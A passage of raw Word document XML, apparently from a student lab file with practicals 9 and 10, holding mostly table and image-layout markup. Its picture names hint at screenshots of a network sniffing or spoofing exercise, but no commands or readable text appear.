          <w:p w14:paraId="00F86A73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46C88858" w14:textId="77777777" w:rsidTr="00C831A6">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2641D657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6875E802" w14:textId="77777777" w:rsidTr="00C831A6">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16236F6A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0DDB2628" w14:textId="77777777" w:rsidTr="00C831A6">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E527EE7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40A9F8A3" w14:textId="77777777" w:rsidTr="00C831A6">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B5395E3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4781C6D9" w14:textId="77777777" w:rsidTr="00C831A6">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53B45084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ECE" w14:paraId="63AB3F89" w14:textId="77777777" w:rsidTr="00C831A6">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58B64614" w14:textId="77777777" w:rsidR="00184ECE" w:rsidRDefault="00184ECE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B1558B" w14:textId="77777777" w:rsidR="00184ECE" w:rsidRPr="00BB6EDB" w:rsidRDefault="00184ECE" w:rsidP="00184ECE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D2B891E" w14:textId="77777777" w:rsidR="00184ECE" w:rsidRPr="00BB6EDB" w:rsidRDefault="00184ECE" w:rsidP="00184EC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1E661383" w14:textId="77F62E5D" w:rsidR="006E2B58" w:rsidRDefault="00184ECE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00454843" w14:textId="72FDEDBE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12967562" w14:textId="77777777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02757BBD" w14:textId="6DBD634E" w:rsidR="006E2B58" w:rsidRDefault="00184ECE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561B9C61" w14:textId="26ACAFD0" w:rsidR="006E2B58" w:rsidRDefault="00184ECE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413F6533" wp14:editId="3C315729">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-27930</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8106060</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5220335" cy="1781175"/>
            <wp:effectExtent l="76200" t="76200" r="132715" b="142875"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1632450637" name="Picture 163245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b__dsniff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3AF786" w14:textId="02489A40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36522E0A" w14:textId="09BD1699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36189159" w14:textId="678CCBC9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1F72D0AA" w14:textId="12BBB9CA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46D33E6B" w14:textId="310E6604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106C6473" w14:textId="29563DB6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6C8A2FDA" w14:textId="3E0B233B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4C53650D" w14:textId="16B85C28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39B42008" w14:textId="4E3DA0E8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2D52C17E" w14:textId="5AD5D71D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58AA534B" w14:textId="194A4355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5105DA9C" w14:textId="68A07E7E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70219039" w14:textId="52A6BC7D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6199E2E5" w14:textId="67A26313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5BBFC1B8" w14:textId="6677864F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12687612" w14:textId="4C863D32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54E68AE5" w14:textId="2B6B43F7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4D1B2D3A" w14:textId="26A2E363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51FA1439" w14:textId="01E69E96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075E85BC" w14:textId="503D3B57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581A525C" w14:textId="04D67535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325B274E" w14:textId="6DFFA5E3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038BEB68" w14:textId="29D2A4AA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1103C3DC" w14:textId="587D87F1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62D50B28" w14:textId="2219D8DF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54A1A699" w14:textId="58810F47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6A33EC82" w14:textId="65052FA2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13015616" w14:textId="3550439D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633EABA9" w14:textId="764C5320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691DDF92" w14:textId="3A16C213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16202B2C" w14:textId="6B24E969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021B445B" w14:textId="6B19F70D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0646DC9E" w14:textId="79F19C72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450BC177" w14:textId="77777777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050A6018" w14:textId="7627BA40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</w:p>
    <w:p w14:paraId="30B5D68B" w14:textId="3974AE8E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4BF05E68" w14:textId="4C595C38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17EFE0EC" wp14:editId="146AB021">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-59690</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1732242</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5144770" cy="2355215"/>
            <wp:effectExtent l="76200" t="76200" r="132080" b="140335"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1632450638" name="Picture 163245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_forw_intrfa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35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B24F1" w14:textId="5B74DAE3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2CFE2D87" w14:textId="7A106643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1B33B9FF" wp14:editId="62300788">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5063082</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5431790" cy="1831975"/>
            <wp:effectExtent l="76200" t="76200" r="130810" b="130175"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1632450639" name="Picture 16324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victim_net_wrk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3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F4804F" w14:textId="679DDB86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1E05F7E" w14:textId="2583A28A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6D0B8A1F" wp14:editId="6B4C7B2A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-137719</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7642140</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5431155" cy="916305"/>
            <wp:effectExtent l="76200" t="76200" r="131445" b="131445"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1632450640" name="Picture 163245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p_spoffing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8"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5431155" cy="916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75A59B1F" w14:textId="7351D5CA" w:rsidR="00184ECE" w:rsidRDefault="00184ECE" w:rsidP="0094614E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="355568F7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BFC7EC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B0CEAE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77475D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B8ADEA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2437DA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F8869F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1B862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0E2B5C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4DFE9B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3C3FC5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553C09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C0DBC7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746AAB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29B9C6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7EAE19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6C7FA8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670D0C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19A75A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D72B95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639C4F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27F0FB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7C522F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288481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4355CE" w14:textId="77777777" w:rsidR="00184ECE" w:rsidRPr="00184ECE" w:rsidRDefault="00184ECE" w:rsidP="006E2B58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59FB960D" w14:textId="77777777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736CC150" w14:textId="77777777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1D8DD0B" w14:textId="77777777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30AE159" w14:textId="77777777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2A5FB33A" w14:textId="77777777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7A03810A" w14:textId="2639B615" w:rsidR="00184ECE" w:rsidRP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  <w:r w:rsidRPr="00184ECE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5B90DC" w14:textId="587E3F8A" w:rsidR="00184ECE" w:rsidRPr="00184ECE" w:rsidRDefault="00184ECE" w:rsidP="00184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45FF6139" wp14:editId="02EF7D85">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1555750</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4530090" cy="2910840"/>
            <wp:effectExtent l="76200" t="76200" r="137160" b="137160"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1632450641" name="Picture 163245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ACK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91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F1DE" w14:textId="56DCE270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</w:p>
    <w:p w14:paraId="2C1B3949" w14:textId="2D30D8FF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3D3DA162" wp14:editId="0132A4B6">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-28575</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionV>
            <wp:extent cx="5062855" cy="826770"/>
            <wp:effectExtent l="76200" t="76200" r="137795" b="125730"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1632450642" name="Picture 163245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_net_cmd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b="15686"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5062855" cy="8267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DFA0" w14:textId="0ADEF84F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</w:p>
    <w:p w14:paraId="7B22CC68" w14:textId="26E89570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467495DD" wp14:editId="7D904721">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>26035</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6878320</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3138805" cy="2230120"/>
            <wp:effectExtent l="76200" t="76200" r="137795" b="132080"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1632450643" name="Picture 163245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ctim_hack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230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B949B" w14:textId="43B9C001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4D80B6A5" w14:textId="77777777" w:rsidR="00184ECE" w:rsidRDefault="00184ECE" w:rsidP="00184ECE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4807C9CB" w14:textId="5DEBB440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366EF310" w14:textId="596F714C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235A4B33" w14:textId="5A03AE28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5A3D0B12" w14:textId="72DEA9DF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6327C546" w14:textId="07C7F29D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CB31EE5" w14:textId="1EB4F0F7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E8CE8EF" w14:textId="1ED0CAF4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4B06B9F9" w14:textId="5C195C4C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53F6BD74" w14:textId="3BCEEFEB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0CD6EFFA" w14:textId="2CC108FD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04828A1C" w14:textId="1EF9107E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53FA6DB7" w14:textId="494FEB4F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A0309C5" w14:textId="019A9CC4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237CC8A5" w14:textId="052A39B0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3FF3C873" w14:textId="065DCC1E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576C5F15" w14:textId="73888DB4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58B133DE" w14:textId="211FA0B2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5564865C" w14:textId="0C834C05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24081211" w14:textId="64A9DD22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63953BB7" w14:textId="6F20B791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552F1895" w14:textId="0ACEDCFB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3D003C49" w14:textId="4D1591B6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4F83E11C" w14:textId="115FE1E4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26699ED4" w14:textId="3CFEEAEE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A8783FB" w14:textId="5BDEEDA7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25005B9" w14:textId="22F84CD2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2AA7DA20" w14:textId="0467BC32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AAB70FB" w14:textId="3E1A041B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071C5F1F" w14:textId="6679DD89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6C34B03A" w14:textId="3C598AA5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5228B33B" w14:textId="7E70CFB9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48DDDE9F" w14:textId="02B261B1" w:rsid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40F22ABB" w14:textId="255E272B" w:rsidR="00184ECE" w:rsidRPr="00184ECE" w:rsidRDefault="00184ECE" w:rsidP="00184ECE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1587D366" w14:textId="77777777" w:rsidR="00184ECE" w:rsidRDefault="00184ECE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733DBF" w14:textId="0DDA94B6" w:rsidR="006E2B58" w:rsidRPr="00BB6EDB" w:rsidRDefault="006E2B58" w:rsidP="006E2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8264AF" wp14:editId="4C5D7FD7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725C" id="Straight Connector 5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A4C12">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>PRACTICAL NO. 9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17148B27" w14:textId="77777777" w:rsidR="006E2B58" w:rsidRPr="00BB6EDB" w:rsidRDefault="006E2B58" w:rsidP="006E2B5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0A2B0494" w14:textId="77777777" w:rsidR="006E2B58" w:rsidRPr="00BB6EDB" w:rsidRDefault="006E2B58" w:rsidP="006E2B58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FE3505" wp14:editId="6844D974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BE0F" id="Straight Connector 57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F5B5817" w14:textId="77777777" w:rsidR="006E2B58" w:rsidRPr="00BB6EDB" w:rsidRDefault="006E2B58" w:rsidP="006E2B5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6E2B58" w14:paraId="202EF867" w14:textId="77777777" w:rsidTr="00051CD1">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E4F3848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1BD0D057" w14:textId="77777777" w:rsidTr="00051CD1">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44FC3D84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774B412B" w14:textId="77777777" w:rsidTr="00051CD1">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34D555D9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08BFCCE3" w14:textId="77777777" w:rsidTr="00051CD1">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D0FF892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17FF2549" w14:textId="77777777" w:rsidTr="00051CD1">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4123DDC2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4524B1DF" w14:textId="77777777" w:rsidTr="00051CD1">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="324611C6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464E63DD" w14:textId="77777777" w:rsidTr="00051CD1">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BC882CB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3ACD6C1A" w14:textId="77777777" w:rsidTr="00051CD1">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4859DF04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55088BA1" w14:textId="77777777" w:rsidTr="00051CD1">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75B8FE81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B58" w14:paraId="3E1A849E" w14:textId="77777777" w:rsidTr="00051CD1">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43E18790" w14:textId="77777777" w:rsidR="006E2B58" w:rsidRDefault="006E2B58" w:rsidP="0005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E6B0E" w14:textId="77777777" w:rsidR="006E2B58" w:rsidRPr="00BB6EDB" w:rsidRDefault="006E2B58" w:rsidP="006E2B58">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="333DC0C4" w14:textId="77777777" w:rsidR="006E2B58" w:rsidRPr="00BB6EDB" w:rsidRDefault="006E2B58" w:rsidP="006E2B5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63190062" w14:textId="7F01DF5F" w:rsidR="006E2B58" w:rsidRDefault="006E2B58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05E34DBB" w14:textId="7777777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0F2DDBE" w14:textId="7C29A91D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6549C7DA" w14:textId="7777777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83A0322" w14:textId="5A84DC06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35F9A640" w14:textId="7777777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1C472DB" w14:textId="456BB772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50697438" w14:textId="789C6015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21EFA5F" w14:textId="6BD6A584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2498AD8B" w14:textId="10467940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AA65839" w14:textId="12011C69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14:paraId="4FABAF1A" w14:textId="086952D0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B9AAB49" w14:textId="07A9F26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1DC61073" w14:textId="5271BEE1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0B492EE" w14:textId="5A75A274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DE62EDA" w14:textId="32A064EC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E4C71CC" w14:textId="65B6848F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6085FE8" w14:textId="2A5407B9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4B8FFC6" w14:textId="7839384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630E49E" w14:textId="5CBF5FBB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4C87D13" w14:textId="0A730A36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A5B77F4" w14:textId="2215D0A4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9F1E6F0" w14:textId="10356A58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C3D6DAF" w14:textId="0BA5C9DD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23DDD5A" w14:textId="4A61BD21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2A18982" w14:textId="2A2516FF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BEFF526" w14:textId="6F9C9BB4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60E2D9E" w14:textId="48F8EF86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1109BB74" w14:textId="3D69077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1502E29" w14:textId="7C078AC5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863AA64" w14:textId="328CA940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945DDCE" w14:textId="685B14B4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9363AAD" w14:textId="0075A6F0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C91FF7B" w14:textId="4802F7A9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4E3FBDE" w14:textId="29423596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C0E8F56" w14:textId="059DB9E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EF17683" w14:textId="605C3DC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DBAF25A" w14:textId="17F0589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A834FED" w14:textId="1A9E2459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FE51784" w14:textId="52C3EABC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1110896" w14:textId="4583379C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5F942B2" w14:textId="56809D80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1F27147D" w14:textId="3949C2D9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DC4C497" w14:textId="60B6B2D0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BF6CD39" w14:textId="262BE09F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C54F03A" w14:textId="6190D150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BBAC7CD" w14:textId="178FBFD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9ABEE7A" w14:textId="439E27D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</w:p>
    <w:p w14:paraId="6334CFC3" w14:textId="249BFD7C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 w:rsidRPr="00AA4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7BA18FAB" wp14:editId="4A617A73">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1496060</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4095115" cy="2481580"/>
            <wp:effectExtent l="76200" t="76200" r="133985" b="1282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481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BD898" w14:textId="34E5EE2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14:paraId="567A39AA" w14:textId="145A3EA9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 w:rsidRPr="00AA4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 wp14:anchorId="12B0141F" wp14:editId="0456494F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4797599</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4098925" cy="2160905"/>
            <wp:effectExtent l="76200" t="76200" r="130175" b="12509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16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0562" w14:textId="607EB8A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14:paraId="6D7B925D" w14:textId="65228FD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 w:rsidRPr="00AA4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1D4F1BFE" wp14:editId="398A758F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>14605</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:posOffset>6831965</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4178300" cy="2386330"/>
            <wp:effectExtent l="76200" t="76200" r="127000" b="12827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38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3DCA2" w14:textId="2D47E31F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02D256F" w14:textId="0FCCB71C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B995D93" w14:textId="05A7B748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E2F07B2" w14:textId="3D46F688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66C8217" w14:textId="6BC79F85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43F921F" w14:textId="75D5A32C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1FE1CF1D" w14:textId="34D35664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AA5FF6A" w14:textId="3D444B1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0028DED" w14:textId="7D0B7045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ADF0998" w14:textId="197FDDAB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967AD9B" w14:textId="797BEDE5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2625B2F" w14:textId="3250F09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62BAF5E" w14:textId="34F39E6A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1110641" w14:textId="05299281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6E61CC2" w14:textId="64E9FECC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FE0BB20" w14:textId="6B77A911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89DE77C" w14:textId="0CC6790F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51EF557" w14:textId="7FB6C99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261A963" w14:textId="17ABFF8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3C76993D" w14:textId="2CE17FAB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1EB9A09" w14:textId="26814016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7844649" w14:textId="3889447F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05159E26" w14:textId="2960BB66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F01F63E" w14:textId="09509F9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5070918" w14:textId="29F4C220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DC80863" w14:textId="6DF691BB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741B5FC" w14:textId="1EEF528D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E3EA212" w14:textId="23DC64E2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916EB7F" w14:textId="5F554638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6573BF70" w14:textId="24841783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A86BEAC" w14:textId="1E4DD4A2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2AE2FFFA" w14:textId="6182EB57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768B5A6B" w14:textId="5B18B7B3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E4C3F8B" w14:textId="2E2E9874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4C9B75A1" w14:textId="3E48E09D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</w:p>
    <w:p w14:paraId="0CDDCB98" w14:textId="30D6A4AE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 w:rsidRPr="00AA4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2455BA9E" wp14:editId="138FE844">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3175</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1460500</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5272405" cy="2261235"/>
            <wp:effectExtent l="76200" t="76200" r="137795" b="13906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61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B831E" w14:textId="708A0112" w:rsidR="00AA4C12" w:rsidRDefault="00AA4C12" w:rsidP="006E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14:paraId="795814AF" w14:textId="77777777" w:rsidR="00AA4C12" w:rsidRPr="00A5146C" w:rsidRDefault="00AA4C12" w:rsidP="006E2B58">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51309FFE" w14:textId="55FD624C" w:rsidR="006E2B58" w:rsidRDefault="00AA4C12" w:rsidP="006E2B58">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA4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05828677" wp14:editId="3A7C48AD">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3249</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4441371</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5431790" cy="1890395"/>
            <wp:effectExtent l="76200" t="76200" r="130810" b="12890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90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76BECB" w14:textId="725B0A2E" w:rsidR="006E2B58" w:rsidRPr="006E2B58" w:rsidRDefault="006E2B58" w:rsidP="006E2B58">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61D2B191" w14:textId="77777777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1F94727" w14:textId="75654695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951BD03" w14:textId="353B332C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3B26DE39" w14:textId="5C0E3151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786E983" w14:textId="4CFCF581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F633BD8" w14:textId="3CFB891D" w:rsidR="00AA4C12" w:rsidRDefault="00AA4C12" w:rsidP="0094614E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18C7E77E" w14:textId="48088AF7" w:rsidR="00AA4C12" w:rsidRDefault="00AA4C12" w:rsidP="0094614E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AC7F66F" w14:textId="3445A57D" w:rsidR="00AA4C12" w:rsidRDefault="00AA4C12" w:rsidP="0094614E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C14983F" w14:textId="7D217D41" w:rsidR="00AA4C12" w:rsidRDefault="00AA4C12" w:rsidP="00AA4C12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0F8A4288" w14:textId="73B7A1E4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6CAA45B" w14:textId="25ABB3D1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71E31CA" w14:textId="7273BD05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D274CC5" w14:textId="7CCC8806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D8B3A73" w14:textId="55614623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FCC9B63" w14:textId="0D7EEC24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935E410" w14:textId="196531AE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A2F8E4A" w14:textId="03D710A9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CA6E494" w14:textId="4BC35E62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108BA28" w14:textId="1CAFFB16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64042A0" w14:textId="0AAE1944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540C07DD" w14:textId="4F1C7526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1C72141" w14:textId="591BD4D2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BC04FE9" w14:textId="3BC66C65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463934DC" w14:textId="1BADB16B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717C1303" w14:textId="3FF23C52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4B00F4B9" w14:textId="7EB93C5D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234DAFDA" w14:textId="765FFF9B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5BDDCD1A" w14:textId="67123895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411199AD" w14:textId="5B414AC0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72DD9DD6" w14:textId="3AFCFEC6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16C6B84A" w14:textId="6098B7DC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5DD26FFA" w14:textId="6D1EA9BA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4C623197" w14:textId="6E1552C8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4315B632" w14:textId="32FB799A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7474CFD3" w14:textId="4055CB69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36695B6E" w14:textId="02E54E1A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31F1E555" w14:textId="27F7B5F7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650C852B" w14:textId="2C5DA48E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1F7E9E93" w14:textId="57962FB6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37B14FCE" w14:textId="284F60E3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0844B025" w14:textId="4E264073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2C8360C8" w14:textId="4724ACCD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65060DA3" w14:textId="344605E6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7D5D20AB" w14:textId="78BB3156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40609BC4" w14:textId="55447ADB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47DFAFC1" w14:textId="26136B4B" w:rsidR="002A5719" w:rsidRPr="00BB6EDB" w:rsidRDefault="002A5719" w:rsidP="002A571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62DF88" wp14:editId="59264D3B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FB5D" id="Straight Connector 58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10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B665820" w14:textId="77777777" w:rsidR="002A5719" w:rsidRPr="00BB6EDB" w:rsidRDefault="002A5719" w:rsidP="002A571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504FBBBC" w14:textId="77777777" w:rsidR="002A5719" w:rsidRPr="00BB6EDB" w:rsidRDefault="002A5719" w:rsidP="002A5719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6DAEB2" wp14:editId="63D3A978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9B6F" id="Straight Connector 59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DE1FBBB" w14:textId="77777777" w:rsidR="002A5719" w:rsidRPr="00BB6EDB" w:rsidRDefault="002A5719" w:rsidP="002A571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2A5719" w14:paraId="1A8A42BC" w14:textId="77777777" w:rsidTr="00773B89">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01830603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3498993F" w14:textId="77777777" w:rsidTr="00773B89">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="452EEF21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5B9B6468" w14:textId="77777777" w:rsidTr="00773B89">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D3BD65C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712CC0E2" w14:textId="77777777" w:rsidTr="00773B89">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7367D394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1696E0D8" w14:textId="77777777" w:rsidTr="00773B89">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CF0A280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6BCF385E" w14:textId="77777777" w:rsidTr="00773B89">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="353C77DD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60634558" w14:textId="77777777" w:rsidTr="00773B89">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07B25B3F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4609CFA7" w14:textId="77777777" w:rsidTr="00773B89">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B68296B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43E5912F" w14:textId="77777777" w:rsidTr="00773B89">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01701516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19" w14:paraId="5E03CCDC" w14:textId="77777777" w:rsidTr="00773B89">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9013" w:type="dxa"/>
          </w:tcPr>
